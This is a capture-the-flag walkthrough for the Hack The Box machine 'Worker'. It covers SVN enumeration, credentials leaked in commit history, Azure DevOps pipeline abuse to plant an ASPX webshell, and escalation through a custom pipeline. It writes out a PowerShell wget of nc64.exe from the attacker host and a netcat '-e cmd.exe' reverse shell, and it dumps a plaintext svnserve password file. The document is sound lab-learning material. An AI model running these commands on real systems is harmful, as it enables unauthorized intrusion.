Worker HTB

IP

10.10.10.203

initial nmap scan 

sudo nmap -p- --min-rate 10000 10.10.10.203 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open on the target machine 

80,3690,5985

Lets run a more in-depth scan of these ports

sudo nmap -sCV -p80,3690,5985 -oA tcp_ports 10.10.10.203

results

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

what we can see

  • HTTP web server IIS 10.0

  • Port 3690: subversion whats is it

    • svnserver is a lightweight server, capable of speaking to clients over TCP/IP using a custom and stateful protocol, its main function is to act as a centralized version control system, it is currently licensed under Apache

  • we are dealing with a windows server

Lets check out the web server

when we access the web server we can see the default IIS server landing page

for good measures we will run feroxbuster and see if we can find any hidden web pages

feroxbuster -u http://10.10.10.203 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x asp,aspx -o dirs_http.txt

Lets check out this svnserve server

enumerating svnserve, we can utilize the tool svn which comes with kali,

  1. Lets list any contents that may be in the repo

svn ls svn://10.10.10.203

we do find something interesting

svn ls svn://10.10.10.203 
dimension.worker.htb/
moved.txt

Looks like we found a possible subdomain and a .txt file

  1. Let's download the repo's contents

svn checkout svn://10.10.10.203

we can see the following

reading moved.txt

looks like we have another subdomain to add to our hosts file

Lets check out these new subdomains

dimension.worker.htb

  • not alot to work with here

for good measure lets run feroxbuster and see if we can find anything

feroxbuster -u http://dimension.worker.htb -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x asp,aspx -o dirs_http.txt

devops.worker.htb

we are asked for a username and password

while checking out the source code we picked up from the subversion server, we didnt find much in the code itself, but we do have a .svn directory

Inside the .svn directory, we do find wc.db which is associated with the Version Control System (VCS) called SQLite WC-NG, which is used by some Subversion (SVN) clients, these wc.db files are used to store metadata and information

we should be able to open the file with sqlitebrowser 

sqlitebrowser wc.db

within the 'PRISTINE' table we can find multiple SHA1 hashes

Let's copy all these hashes to a file

sqlite3 .svn/wc.db

we can query the database

SELECT * FROM PRISTIN;

and we have both the SH1 and MD5 hashes

Once we have saved all the hases to a file lets clean them up before we start running them through hash cat

grep -oP '\$md5 \$\K[^ ]*' hashes > md5_hashes.txt
grep -oP '\$sha1\$\K[^|]*' hashes > sha1_hashes.txt

Now we have our hashes all cleaned up lets run them through hashcat

  • we were unable to crack the hashes, back to the drawing board

back to enumerating svn

we can check the subversion log

svn log svn://10.10.10.203

we can see the following

Looking at the r2 we can see the user nathen added a deployment script Lets check it out

svn up -r2

we do find a set of credentials

nathen: wendel98

but to be safe lets check out the other commits

svn up -r3

we find an updated deploy.ps1 script

  • maybe we dont have a password

svn up -r4

  • nothing new

svn up -r5

  • nothing new

Lets see if these creds work for devops.worker.htb

they are indeed valid and we have access to the DevOps subdomain

we can see

  • we are in Azure DevOps instance

  • we are logged in as the user WORKER/nathen

  • we can see a current project "SmartHotel360"

if we click on the "SmartHotel360" Project then click on repo we can load the SmartHotel360 repo

at the top of the page there is a dropdown that shows other repos that are available in this project

within the menu on the left hand side we can see Pipelines

What are Pipelines in Azure?

  • CI/DC (Continuous Integration and Continuous Deployment) service that automates the build, test, and deployment phases of the dev processes

when we click view (right corner) we can see further details

looking at the YAML file

steps:

- task: CopyFiles@2

  displayName: 'Deploy web site'

  inputs:

    SourceFolder: '$(Build.SourcesDirectory)'

    Contents: |
     **
     !.git/**/*

    TargetFolder: 'w:\sites\$(Build.Repository.Name).worker.htb'

    CleanTargetFolder: true

    OverWrite: true

  timeoutInMinutes: 5

looks like this task takes the files from the source code and writes them into the destination folder (most likely where they are hosted by IIS)

we will keep an eye out for the target folder

if we click on run or Queue we can see the following

Looks like we do have permission s to start a build, which means if we can make modifications to the site via the repo here, we can use the pipeline to push the changes made in the repo to the hosted site

Lets see if we can upload a basic webshell to the site

  1. lets try through the alpha repo, we can click upload file

  1. select our webshell

try to Commit our shell shows the following error

  1. we do have the ability to cerate a branch

  1. Now we should have the ability to upload our webshell

  1. Now back in pipelined, we can select the CICD job for the project we uploaded into (Alpha), and run the build job, giving it the branch we created earlier (shrek123)

  1. Now after 30 secounds or so we can head over to http://alpha.worker.htb/cmdasp.aspx

  • Dont forget to add alpha subdomain to our hosts file

we can run commands on the target server lets

Lets upload nc64.exe to the target server and establish a reverse-shell

  1. Lets start a python http server within the same directory as nc64.exe 

python3 -m http.server 80

2. Through our web shell lets utilize wget to pick up and place our file within the \programdata directory

powershell -c wget 10.10.14.22/nc64.exe -outfile \programdata\nc.exe

  1. Lets start a listner

rlwrap -cAr nc -lvnp 9001

  1. Lets execute nc.exe

\programdata\nc.exe -e cmd.exe 10.10.14.22 9001

we have a shell on the target

looking through the \Users directory we can see the users on the system

Since we know there is a Azure DevOps instance lets see if there is any reference from the Azure DevOps Pipeline to W: , We can list all the drives on the target by using wmic 

wmic logicaldisk get deviceid, volumename, description

  • we can most certainly see the W: drive

we can get the same results using powershell to 

powershell -c get-psdrive -psprovider filesystem

Lets jump over to the w:

w:

Looking through the files we do something interesting

within the /w/svnrepos/www/conf we find the file passwd 

more passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday

  • as you can see we have a list of plain text passwords, wonder if these are the same passwords but unhashed we found earlier

we did see a user named robisl in the /Users and we can see a user in the passwd file that matches along with a password, lets see if we can winrm into the machine 

evil-winrm -i 10.10.10.203 -u robisl -p 'wolves11'

  • it works!

  • Couldnt find a whole lot in the way of priv esc

Lets see if we can login to DevOps using ribisl creds

  • we have authentication

  • we can see a different project, contains alot of files but none seem to interesting

within the Project Setting -> General -> Security we can see robisl is a build administrator

  • This group has the ability to define builds with CI and other pipeline related tasks.

Lets see if we can create a pipeline

  1. we want to navigate to Pipelines -> New Pipeline

  1. lets select Azure Repos Git, and then select PartUnlimited from the list

  1. Now we want to select what kind of project this will be select Starter Pipeline

  • we should see a YAML file that defines the pipeline

Lets break down this YAML file

  • trigger: will define when this runs, in this default case, the pipeline will run on commits (or merges) to the master branch, Now our current user robisl doesnt have permission to commit to master, but saving will also run the pipeline, so trigger is to important

  • pool: defines how the pipeline runs.

  • steps : defines the various scripts that will run in order. A script can be on line, or in YAML | indicates a multiline string keeping newlines until the next based on ident

Lets troubleshoot the template

When we try to run our templates doesn't get pushed to the branch as the user ronisl isn't permitted

  1. Lets create a new branch named shrek1234

we do get he following error

why is it failing?

  • because there is not a pool named Default and robisl doesnt have the permissions to authorize resources.

how can we fix this?

  • we can click on the Azure DevOps logo in the top left corner of the screen, then collection settings at the bottom left, on the left side, there's a menu for Agents pools

  • there is a pool called Setup

  1. Lets go back to Pipelines for PartsUnlimited and start a new Pipeline. At the config, we will name the poo; Setup , save and run

  • we will need to deleted the branch we created or create a new one ( created a new one shrek12345)

when we save and run we can see the following

  1. we can see in the summary everything worked just fine

Gaining a shell on the system

if we look back in the YAML file, we have the ability to run scripts and programs on the target server, remeber we upload nc.exe Lets see if we can execute it and gain shell on the system

  1. start a nc listener

rlwrap -cAr nc -lvnp 9001

  1. same processes as before but we are going to edit the script field in the YAML file

  1. let's save and run

  1. if we look at our listener we can see the following

PreviousVisual HTBNextFuse HTB

Last updated